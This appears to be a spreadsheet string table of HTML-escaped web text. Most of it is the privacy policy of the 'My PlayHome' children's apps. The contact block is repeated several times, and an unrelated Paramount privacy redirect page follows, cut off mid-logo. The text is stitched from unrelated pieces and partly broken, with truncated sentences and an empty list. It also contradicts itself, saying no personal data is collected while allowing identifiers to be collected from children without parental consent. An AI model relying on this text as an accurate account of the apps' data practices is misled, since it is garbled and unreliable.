P, BLOCKQUOTE,li {
    font-family: Verdana;
    font-size: 14px;
    color: #555555;
    line-height: 1.5;
    letter-spacing: .25px;
}
BLOCKQUOTE {
    font-family: Georgia, serif;
    font-style: italic;
    color: #444444;
    letter-spacing: 1.25px;
    line-height: 1.5;
    background: #EEEEEE;
    padding: 5px;
    margin: auto 15px;
}
A {
    color: #006600;
}
ABBR {
    border-bottom: dotted 1px #006600;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;div class="text"&gt;
&lt;h1&gt;Summary&lt;/h1&gt;
&lt;p&gt; My PlayHome  apps do not collect any personal information.&lt;/p&gt;
&lt;p&gt;There are no 3rd party advertisements, links to web sites or any social media.&lt;/p&gt;
&lt;p&gt;Some basic usage information is sent to Microsoft App Center.</t>
  </si>
  <si>
    <t>This information contains what type of device you are using and information for our programmers in the event that the app crashes. We use this information exclusively to track down problems with the app. However, to repeat, no personal information is transmitted or stored for this.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;Microsoft's Privacy statement is here: &lt;a href="https://privacy.microsoft.com/en-us/privacystatement"&gt;https://privacy.microsoft.com/en-us/privacystatement &lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;The app also contacts our server to get an image with news about our other apps. The only data that is sent to our servers is which of our apps you currently have installed in order that we don't send an advertisement for a My PlayHome app that you already have.&lt;/p&gt;
&lt;p&gt; There now follows a more formal statement for those of you that like legalise.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;Last updated: June 25, 2020&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy describes Our policies and procedures on the collection, use and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.&lt;/p&gt;
&lt;p&gt; We use Your Personal data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy.&lt;/p&gt;
&lt;h1&gt;Interpretation and Definitions&lt;/h1&gt;
&lt;h2&gt;Interpretation&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The words of which the initial letter is capitalized have meanings defined under the following conditions.&lt;/p&gt;
&lt;p&gt; The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.&lt;/p&gt;
&lt;h2&gt;Definitions&lt;/h2&gt;
&lt;p&gt;For the purposes of this Privacy Policy:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;You&lt;/strong&gt; means the individual accessing or using the Service, or the company, or other legal entity on behalf of which such individual is accessing or using the Service, as applicable.&lt;/p&gt;
        &lt;p&gt;Under GDPR (General Data Protection Regulation), You can be referred to as the Data Subject or as the User as you are the individual using the Service.&lt;/p&gt;    &lt;/li&gt;
     &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;Company&lt;/strong&gt; (referred to as either "the Company", "We", "Us" or "Our" in this Agreement) refers to PlayHome Software Ltd, Bet Shemesh.&lt;/p&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>For the purpose of the GDPR, the Company is the Data Controller.&lt;/p&gt;    &lt;/li&gt;
    &lt;li&gt;&lt;strong&gt; Application&lt;/strong&gt; means the software program provided by the Company downloaded by You on any electronic device, named My PlayHome&lt;/li&gt;    &lt;li&gt;&lt;strong&gt;Affiliate&lt;/strong&gt; means an entity that controls, is controlled by or is under common control with a party, where "control" means ownership of 50% or more of the shares, equity interest or other securities entitled to vote for election of directors or other managing authority.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Account&lt;/strong&gt; means a unique account created for You to access our Service or parts of our Service.&lt;/li&gt;
            &lt;li&gt;&lt;strong&gt;Service&lt;/strong&gt; refers to the Application.&lt;/li&gt;
        &lt;li&gt;&lt;strong&gt;Country&lt;/strong&gt; refers to: Israel&lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;Service Provider&lt;/strong&gt; means any natural or legal person who processes the data on behalf of the Company. It refers to third-party companies or individuals employed by the Company to facilitate the Service, to provide the Service on behalf of the Company, to perform services related to the Service or to assist the Company in analyzing how the Service is used.&lt;/p&gt;
        &lt;p&gt;For the purpose of the GDPR, Service Providers are considered Data Processors.&lt;/p&gt;    &lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Third-party Social Media Service&lt;/strong&gt; refers to any website or any social network website through which a User can log in or create an account to use the Service.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Facebook Fan Page&lt;/strong&gt; is a public profile named "My PlayHome - an app for kids" specifically created by the Company on the Facebook social network, accessible from https://www.facebook.com/playhome/&lt;/li&gt;    
    &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;Personal Data&lt;/strong&gt; is any information that relates to an identified or identifiable individual.&lt;/p&gt;
        &lt;p&gt; For the purposes for GDPR, Personal Data means any information relating to You such as a name, an identification number, location data, online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity.&lt;/p&gt;        &lt;p&gt; For the purposes of the CCPA, Personal Data means any information that identifies, relates to, describes or is capable of being associated with, or could reasonably be linked, directly or indirectly, with You.&lt;/p&gt;    &lt;/li&gt;
        &lt;li&gt;&lt;strong&gt;Device&lt;/strong&gt; means any device that can access the Service such as a computer, a cellphone or a digital tablet.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Usage Data&lt;/strong&gt; refers to data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Data Controller&lt;/strong&gt;, for the purposes of the GDPR (General Data Protection Regulation), refers to the Company as the legal person which alone or jointly with others determines the purposes and means of the processing of Personal Data.&lt;/li&gt;     &lt;li&gt;&lt;strong&gt;Do Not Track&lt;/strong&gt; (DNT) is a concept that has been promoted by US regulatory authorities, in particular the U.S. Federal Trade Commission (FTC), for the Internet industry to develop and implement a mechanism for allowing internet users to control the tracking of their online activities across websites.&lt;/li&gt;        &lt;li&gt;&lt;strong&gt;Business&lt;/strong&gt;, for the purpose of the CCPA (California Consumer Privacy Act), refers to the Company as the legal entity that collects Consumers' personal information and determines the purposes and means of the processing of Consumers' personal information, or on behalf of which such information is collected and that alone, or jointly with others, determines the purposes and means of the processing of consumers' personal information, that does business in the State of California.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Consumer&lt;/strong&gt;, for the purpose of the CCPA (California Consumer Privacy Act), means a natural person who is a California resident. A resident, as defined in the law, includes (1) every individual who is in the USA for other than a temporary or transitory purpose, and (2) every individual who is domiciled in the USA who is outside the USA for a temporary or transitory purpose.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Sale&lt;/strong&gt;, for the purpose of the CCPA (California Consumer Privacy Act), means selling, renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a Consumer's Personal information to another business or a third party for monetary or other valuable consideration.&lt;/li&gt;
    &lt;/ul&gt;
&lt;h1&gt;Collecting and Using Your Personal Data&lt;/h1&gt;
&lt;h2&gt;Types of Data Collected&lt;/h2&gt;
                        &lt;li&gt;Usage Data&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Usage Data&lt;/h3&gt;
&lt;p&gt;Usage Data is collected automatically when using the Service.&lt;/p&gt;
&lt;p&gt;Usage Data may include information such as Your Device's Internet Protocol address (e.g. IP address), browser type, browser version, the pages of our Service that You visit, the time and date of Your visit, the time spent on those pages, unique device identifiers and other diagnostic data.&lt;/p&gt;
&lt;p&gt;When You access the Service by or through a mobile device, We may collect certain information automatically, including, but not limited to, the type of mobile device You use, Your mobile device unique ID, the IP address of Your mobile device, Your mobile operating system, the type of mobile Internet browser You use, unique device identifiers and other diagnostic data.&lt;/p&gt;
&lt;p&gt;We may also collect information that Your browser sends whenever You visit our Service or when You access the Service by or through a mobile device.&lt;/p&gt;
&lt;h3&gt;Information Collected while Using the Application&lt;/h3&gt;
&lt;p&gt;While using Our Application, in order to provide features of Our Application, We may collect, with your prior permission:&lt;/p&gt;
&lt;ul&gt;
      &lt;/ul&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use this information to provide features of Our Service, to improve and customize Our Service. The information may be uploaded to the Company's servers and/or a Service Provider's server or it be simply stored on Your device.&lt;/p&gt;
&lt;h2&gt;Retention of Usage Data&lt;/h2&gt;
&lt;p&gt; The Company will retain Usage Data for internal analysis purposes.</t>
  </si>
  <si>
    <t>Usage Data is generally retained for a shorter period of time, except when this data is used to strengthen the security or to improve the functionality of Our Service, or We are legally obligated to retain this data for longer time periods.&lt;/p&gt;
&lt;h1&gt;Detailed Information on the Processing of Your Personal Data&lt;/h1&gt;
&lt;p&gt;Service Providers have access to Your Personal Data only to perform their tasks on Our behalf and are obligated not to disclose or use it for any other purpose.&lt;/p&gt;
&lt;h2&gt;Analytics&lt;/h2&gt;
&lt;p&gt;We may use third-party Service providers to monitor and analyze the use of our Service.&lt;/p&gt;
&lt;ul&gt;
                &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;Microsoft App Center&lt;/strong&gt;&lt;/p&gt;
        &lt;p&gt; We use Microsoft App Center to collect anonymous data relating to the quality of the services (for example crashes, behaviour). If you want to learn more of Microsoft’s Privacy Policy, please see &lt;a href="https://privacy.microsoft.com/en-us/privacystatement"&gt;https://privacy.microsoft.com/en-us/privacystatement&lt;/a&gt;.&lt;/p&gt;
    &lt;/li&gt;
      &lt;/ul&gt;
&lt;h1&gt;Facebook Fan Page&lt;/h1&gt;
&lt;h2&gt;Data Controller for the Facebook Fan Page&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Company is the Data Controller of Your Personal Data collected while using the Service. As operator of the Facebook Fan Page (https://www.facebook.com/playhome/), the Company and the operator of the social network Facebook are Joint Controllers.&lt;/p&gt;
&lt;p&gt; The Company has entered into agreements with Facebook that define the terms for use of the Facebook Fan Page, among other things.</t>
  </si>
  <si>
    <t>These terms are mostly based on the Facebook Terms of Service: &lt;a href="https://www.facebook.com/terms.php"&gt;https://www.facebook.com/terms.php&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Visit the Facebook Privacy Policy &lt;a href="https://www.facebook.com/policy.php"&gt;https://www.facebook.com/policy.php&lt;/a&gt; for more information about how Facebook manages Personal data or contact Facebook online, or by mail: Facebook, Inc. ATTN, Privacy Operations, 1601 Willow Road, Menlo Park, CA 94025, United States.&lt;/p&gt;
&lt;h2&gt; Facebook Insights&lt;/h2&gt;
&lt;p&gt; We use the Facebook Insights function in connection with the operation of the Facebook Fan Page and on the basis of the GDPR, in order to obtain anonymized statistical data about Our users.&lt;/p&gt;
&lt;p&gt;For this purpose, Facebook places a Cookie on the device of the user visiting Our Facebook Fan Page.</t>
  </si>
  <si>
    <t>Each Cookie contains a unique identifier code and remains active for a period of two years, except when it is deleted before the end of this period.&lt;/p&gt;
&lt;p&gt;Facebook receives, records and processes the information stored in the Cookie, especially when the user visits the Facebook services, services that are provided by other members of the Facebook Fan Page and services by other companies that use Facebook services.&lt;/p&gt;
&lt;p&gt;For more information on the privacy practices of Facebook, please visit Facebook Privacy Policy here: &lt;a href="https://www.facebook.com/full_data_use_policy"&gt;https://www.facebook.com/full_data_use_policy&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;CCPA Privacy&lt;/h1&gt;
&lt;h2&gt; Your Rights under the CCPA&lt;/h2&gt;
&lt;p&gt;Under this Privacy Policy, and by law if You are a resident of California, You have the following rights:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt; The right to notice.&lt;/strong&gt; You must be properly notified which categories of Personal Data are being collected and the purposes for which the Personal Data is being used.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>The right to access / the right to request.&lt;/strong&gt; The CCPA permits You to request and obtain from the Company information regarding the disclosure of Your Personal Data that has been collected in the past 12 months by the Company or its subsidiaries to a third-party for the third party's direct marketing purposes.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt; The right to say no to the sale of Personal Data.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>You also have the right to ask the Company not to sell Your Personal Data to third parties. You can submit such a request by visiting our "Do Not Sell My Personal Information" section or web page.&lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;The right to know about Your Personal Data.&lt;/strong&gt; You have the right to request and obtain from the Company information regarding the disclosure of the following:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;The categories of Personal Data collected&lt;/li&gt;
            &lt;li&gt;The sources from which the Personal Data was collected&lt;/li&gt;
            &lt;li&gt;The business or commercial purpose for collecting or selling the Personal Data&lt;/li&gt;
            &lt;li&gt;Categories of third parties with whom We share Personal Data&lt;/li&gt;
            &lt;li&gt;The specific pieces of Personal Data we collected about You&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
    &lt;li&gt;&lt;strong&gt; The right to delete Personal Data.&lt;/strong&gt; You also have the right to request the deletion of Your Personal Data that have been collected in the past 12 months.&lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;strong&gt;The right not to be discriminated against.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>You have the right not to be discriminated against for exercising any of Your Consumer's rights, including by:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;Denying goods or services to You&lt;/li&gt;
            &lt;li&gt;Charging different prices or rates for goods or services, including the use of discounts or other benefits or imposing penalties&lt;/li&gt;
            &lt;li&gt;Providing a different level or quality of goods or services to You&lt;/li&gt;
            &lt;li&gt;Suggesting that You will receive a different price or rate for goods or services or a different level or quality of goods or services.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
 My PlayHome apps do not collect any personal data.
 &lt;h2&gt;Do Not Sell My Personal Information&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not collect or sell personal information. However, the Service Providers we partner with (for example, our analytics partners) may use technology on the Service that "sells" personal information as defined by the CCPA law.&lt;/p&gt;
&lt;p&gt;If you wish to opt out of the use of your personal information for interest-based advertising purposes and these potential sales as defined under CCPA law, you may do so by following the instructions below.&lt;/p&gt;
&lt;p&gt;Please note that any opt out is specific to the browser You use. You may need to opt out on every browser that you use.&lt;/p&gt;
&lt;h3&gt;</t>
  </si>
  <si>
    <t>Mobile Devices&lt;/h3&gt;
&lt;p&gt; Your mobile device may give you the ability to opt out of the use of information about the apps you use in order to serve you ads that are targeted to your interests:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;"Opt out of Interest-Based Ads" or "Opt out of Ads Personalization" on Android devices&lt;/li&gt;
  &lt;li&gt;"Limit Ad Tracking" on iOS devices&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can also stop the collection of location information from Your mobile device by changing the preferences on your mobile device.&lt;/p&gt;
&lt;h1&gt;"Do Not Track" Policy as Required by California Online Privacy Protection Act (CalOPPA)&lt;/h1&gt;
&lt;p&gt; Our Service does not respond to Do Not Track signals.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>However, some third party websites do keep track of Your browsing activities. If You are visiting such websites, You can set Your preferences in Your web browser to inform websites that You do not want to be tracked. You can enable or disable DNT by visiting the preferences or settings page of Your web browser.&lt;/p&gt;
&lt;h1&gt;Children's Privacy&lt;/h1&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Service contains content appropriate for children under the age of 13.&lt;/p&gt;
&lt;h2&gt;Information Collected from Children Under the Age of 13&lt;/h2&gt;
&lt;p&gt; The Company may collect and store persistent identifiers such as cookies or IP addresses from Children without parental consent for the purpose of supporting the internal operation of the Service.&lt;/p&gt;
&lt;p&gt;
&lt;p&gt;For further details on the information We might collect, You can refer to the "Types of Data Collected" section of this Privacy Policy. We follow our standard Privacy Policy for the disclosure of personal information collected from and about children.&lt;/p&gt;
ke such a request, You can write to Us using the contact information provided in this Privacy Policy.&lt;/p&gt;
&lt;h1&gt;Your California Privacy Rights (California's Shine the Light law)&lt;/h1&gt;
&lt;p&gt;Under California Civil Code Section 1798 (California's Shine the Light law), California residents with an established business relationship with us can request information once a year about sharing their Personal Data with third parties for the third parties' direct marketing purposes.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>If you'd like to request more information under the California Shine the Light law, and if you are a California resident, You can contact Us using the contact information provided below.&lt;/p&gt;
&lt;h1&gt;California Privacy Rights for Minor Users (California Business and Professions Code Section 22581)&lt;/h1&gt;
&lt;p&gt;California Business and Professions Code section 22581 allow California residents under the age of 18 who are registered users of online sites, services or applications to request and obtain removal of content or information they have publicly posted.&lt;/p&gt;
&lt;p&gt;To request removal of such data, and if you are a California resident, You can contact Us using the contact information provided below, and include the email address associated with Your account.&lt;/p&gt;
&lt;p&gt;Be aware that Your request does not guarantee complete or comprehensive removal of content or information posted online and that the law may not permit or require removal in certain circumstances.&lt;/p&gt;
 &lt;h1&gt;Links to Other Websites&lt;/h1&gt;
&lt;p&gt; Our Service may contain links to other websites that are not operated by Us.</t>
  </si>
  <si>
    <t>If You click on a third party link, You will be directed to that third party's site. We strongly advise You to review the Privacy Policy of every site You visit.&lt;/p&gt;
&lt;p&gt; We have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.&lt;/p&gt;
&lt;h1&gt;Changes to this Privacy Policy&lt;/h1&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may update our Privacy Policy from time to time. We will notify You of any changes by posting the new Privacy Policy on this page.&lt;/p&gt;
&lt;p&gt; We will let You know via email and/or a prominent notice on Our Service, prior to the change becoming effective and update the "Last updated" date at the top of this Privacy Policy.&lt;/p&gt;
&lt;p&gt;You are advised to review this Privacy Policy periodically for any changes.</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h1&gt;Contact Us&lt;/h1&gt;
&lt;p&gt;If you would like any further clarifications, please contact us at &lt;a href="/cdn-cgi/l/email-protection#a9dadcd9d9c6dbdde9c4d0d9c5c8d0c1c6c4ccc8d9d987cac6c4"&gt;&lt;span class="__cf_email__" data-cfemail="02717772726d7076426f7b726e637b6a6d6f676372722c616d6f"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h1&gt;Contact Us&lt;/h1&gt;
&lt;p&gt;If you would like any further clarifications, please contact us at &lt;a href="/cdn-cgi/l/email-protection#2754525757485553674a5e574b465e4f484a424657570944484a"&gt;&lt;span class="__cf_email__" data-cfemail="33404643435c4147735e4a435f524a5b5c5e565243431d505c5e"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h1&gt;Contact Us&lt;/h1&gt;
&lt;p&gt;If you would like any further clarifications, please contact us at &lt;a href="/cdn-cgi/l/email-protection#43303633332c3137032e3a332f223a2b2c2e262233336d202c2e"&gt;&lt;span class="__cf_email__" data-cfemail="a4d7d1d4d4cbd6d0e4c9ddd4c8c5ddcccbc9c1c5d4d48ac7cbc9"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h1&gt;Contact Us&lt;/h1&gt;
&lt;p&gt;If you would like any further clarifications, please contact us at &lt;a href="/cdn-cgi/l/email-protection#d0a3a5a0a0bfa2a490bda9a0bcb1a9b8bfbdb5b1a0a0feb3bfbd"&gt;&lt;span class="__cf_email__" data-cfemail="bccfc9ccccd3cec8fcd1c5ccd0ddc5d4d3d1d9ddcccc92dfd3d1"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h1&gt;Contact Us&lt;/h1&gt;
&lt;p&gt;If you would like any further clarifications, please contact us at &lt;a href="/cdn-cgi/l/email-protection#7c0f090c0c130e083c11050c101d05141311191d0c0c521f1311"&gt;&lt;span class="__cf_email__" data-cfemail="3645434646594442765b4f465a574f5e595b535746461855595b"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;title&gt;Paramount Privacy | Redirecting&lt;/title&gt;&lt;meta content="width=device-width, initial-scale=1" name="viewport" /&gt;&lt;meta charset="UTF-8" /&gt;&lt;meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /&gt;&lt;link href="/assets/img/favicon-32x32.png" rel="icon" /&gt;&lt;style type="text/css"&gt;html, body {
  margin: 0;
  padding: 0;
  background: #000a3c;
  font-family: Muli;
  font-display: swap;
}
main {
  height: 100vh;
  text-align: center;
}
.icon {
  position: relative;
  top: 25%;
}
h2, p {
  color: white;
}
svg {
  max-width: 50%;
}
ul.redirect-links li {
  display: inline-block;
  padding: 0 0.5em ;
}
ul.redirect-links li:not(:last-child) {
  border-right: 2px solid white;
}
ul.redirect-links a {
  color: white;
  text-decoration: none;
}&lt;/style&gt;&lt;script charset="UTF-8" data-domain-script="00e3ba6a-0262-4352-99c4-1a1a67f9be9c" src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script src="//production-cmp.isgprivacy.cbsi.com/cps/redirectDelegate.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;main&gt;&lt;span data-icon="logo" class="container-nVyjt3h icon redirect icon-pnC0_PM" alt="Paramount logo"&gt;&lt;svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 138 38" xml:space="preserve</t>
  </si>
  <si>
    <t>" role="img" aria-label="Paramount logo" alt="Paramount logo"&gt;&lt;style type="text/css"&gt;.st0{fill:#FFFFFF;}&lt;/style&gt;&lt;path class="st0" d="M41.7,9.7c0-6.3-6.7-9.4-14.7-9.4c-8.5,0-16.4,3.8-19.3,9.7c-0.8,1.6-1.2,3.3-1.2,5.1c0,1.5,0.4,3,1.2,4.3c1.2,1.8,3.4,3,6.7,3c4,0,7.1-2.2,7.1-6c0,0,0.1-1.1-1.2-1.1c-1,0-1.3,0.7-1.2,1.1c0.1,3-1.6,5.3-4.8,5.3c-3.5,0-5-3-5-6.2c0-6.6,4.9-10.9,10.1-12.8c2.4-0.9,5-1.4,7.5-1.3c5.8,0,10.6,2.2,10.6,8.2c0,5-4.2,9.3-9.2,9.6l0.2-0.7c1-3.7,2.3-7.7,4.3-10.7c0.1-0.2,0.3-0.5,0.6-0.8l-0.3-0.4c-0.4,0.3-0.9,0.6-1.3,0.9C22.2,15.2,21.9,36.3,9,36.3c-0.4,0-0.9,0-1.3-0.1C5,35.8,3.6,34,3.6,31.5c0-0.5,0.2-1.2,0.2-1.6c0-0.7-0.5-1.3-1.2-1.3c0,0,0,0,0,0H2.4c-1.1,0-1.6,0.9-1.6,2.2c-0.1,3.7,2.7,5.9,6.9,6.3c0.5,0,0.9,0.1,1.4,0.1c10,0,16.2-7.6,18.8-16.8c1.3-0.2,2.6-0.4,3.9-0.8C36.4,18.3,41.7,15.2,41.7,9.7z"/&gt;&lt;path class="st0" d="M137.1,11.9h-3.5l-0.8,1.9l-1.4,3.1h-1.6l-0.5,1.1h1.7l-2.1,4.6c-1.5,3.2-3.8,6.3-5.1,6.3c-0.3,0-0.5-0.1-0.5-0.4s0.1-0.6,0.4-1.4c0.4-1,1.1-2.4,1.6-3.4c0.7-1.5,1.9-3.8,1.9-5s-0.7-2.1-2.2-2.1c-1.6,0-3.1,1-4.4,2.4l0.9-2.1h-3.3l-2.7,6.2c-1.1,2.2-3.3,5.8-4.7,5.8c-0.3,0-0.4-0.2-0.4-0.5c0-0.3,0.1-0.5,0.2-0.8c0.1-0.3,1.7-4.1,1.7-4.1l2.9-6.7h-3.6l-2.8,6.6c-0.9,2-3.1,5.5-4.6,5.5c-0.3,0-0.5-0.2-0.5-0.4v-0.1c0-0.4,0.3-1,0.5-1.5l1.5-3.3l3.1-6.7h-3.6l-0.7,1.5c-0.5,1-1.4,2.2-2.8,2.2c-0.7,0-1-0.3-1.1-0.5c-0.2-2.3-1.6-3.5-3.8-3.5c-2.9,0-5,1.7-6.4,3.8c-0.9,1.5-1.6,3-2.1,4.7c-1.3,2.1-2.6,3.7-3.6,3.7c-0.3,0-0.4-0.1-0.4-0.5c0-0.4,0.4-1.1,0.5-1.4l2.3-4.9c0.6-1.5,1.1-2.5,1.1-3.5c0-1.1-0.7-1.8-1.9-1.8c-1.7,0-3.5,1-4.9,2.6c0-0.3,0.1-0.5,0.1-0.8c0-1.2-0.6-1.8-1.8-1.8c-1.5,0-3.1,0.9-4.6,2.6l0.9-2.3h-3.2L70,23c-1.3,2.9-3.4,5.8-4.6,5.8c-0.3,0-0.4-0.1-0.4-0.5c0-0.6,0.6-1.9,0.9-2.5l3.6-8.2c0.3-0.6-1.5-1-3.7-1c-2.3,0-4.6,1.1-6.3,2.6c-1.2,1-2.1,1.5-2.5,1.5c-0.2,0-0.3-0.1-0.3-0.3c0-0.5,1.2-1.9,1.2-3c0-0.5-0.3-0.8-0.9-0.8c-1.3,0-2.8,1.2-3.9,2.5l0.9-2.3h-3.2L48,23c-1.3,2.9-3.4,5.9-4.6,5.9c-0.3,0-0.4-0.1-0.4-0.5c0-0.6,0.6-1.9,0.9-2.6l3.6-8.2c0.3-0.6-1.5-1-3.7-1c-3.3,0-6.4,2.2-8.1,4.5c-1.9,2.4-3.1,5-3.1,7.1c0,1.7,0.8,2.8,2.6,2.8c2,0,3.6-1.6,4.5-2.7c-0.1,0.2-0.1,0.5-0.1,0.7c0,1.2,0.5,2,1.9,2c1.3,0,2.9-1.1,4.3-2.7l-1.1,2.5H48l3.4-7.7c1.1-2.5,2.4-3.8,2.7-3.8c0.1,0,0.2,0.1,0.2,0.1c0,0.3-0.5,1-0.5,1.6c0,0.6,0.4,1.1,1.3,1.1c0.7,0,1.6-0.4,2.3-0.8c-1.7,2.4-2.9,4.8-2.9,6.9c0,1.7,0.9,2.8,2.6,2.8c1.9,0,3.6-1.8,4.5-2.9c0,0.3-0.1,0.5-0.1,0.8c0,1.1,0.6,2.1,2,2.1c1.5,0,2.6-0.9,4.1-2.7l-1.1,2.5h3.5l3.2-7.3c1.4-3.2,3.3-4.9,4.3-4.9c0.2,0,0.4,0.1,0.5,0.4c0,0,0,0,0,0V19c0,0.4-0.1,0.7-0.3,1l-4.6,10.7h3.6l3.3-7.5c1.4-3.2,3-4.8,4.1-4.8c0.4,0,0.5,0.2,0.5,0.6c0,0.4-0.1,0.8-0.3,1.2L81.2,27c-0.3,0.6-0.5,1.3-0.5,2.1c0,1,0.6,1.9,2.1,1.9c2.1,0,3.6-1.6,5.4-3.9v0.5c0.1,1.9,1.2,3.5,3.9,3.5c3.2,0,5.8-2.2,7.4-5.8c0.6-1.3,1-2.6,1.1-4c0.4,0.2,0.7,0.3,1.1,0.2c0.5,0,1.1-0.1,1.5-0.4l-0.6,1.2c-0.6,1.4-1.4,2.8-1.9,4.1c-0.4,0.7-0.6,1.6-0.6,2.4c0,1.3,0.7,2.2,2.1,2.2c1.4,0,3.4-1.4,4.8-3.3h0c-0.1,0.4-0.1,0.8-0.1,1.2c0,1.1,0.3,2.1,1.8,2.1c1.7,0,3-1.2,4.3-2.8l-1.1,2.5h3.6l2.9-6.5c1.6-3.6,3.2-5.8,4.7-5.8c0.3,0,0.5,0.2,0.5,0.4V19c0,0.6-0.9,2.3-1.7,4c-0.7,1.5-1.3,2.7-1.7,3.6c-0.4,0.8-0.6,1.6-0.6,2.4c0,1.1,0.6,2,2,2c2.1,0,4.1-2,5.3-3.5c-0.3,0.7-0.4,1.5-0.4,2.2c0,2.1,1.2,3.1,3,3.1c1.2,0,2.3-0.4,3.2-1.1c1.4-0.9,2.4-2.4,3.3-3.6l-0.6-0.6c-0.9,1.2-1.8,2.4-2.8,3.1c-0.5,0.4-1.2,0.7-1.8,0.7c-0.7,0-1.2-0.4-1.2-1.3s0.4-2.2,1.1-3.9c0,0,1-2.2,1.9-4.3c0.8-1.8,1.5-3.5,1.7-3.8h2.3l0.5-1.1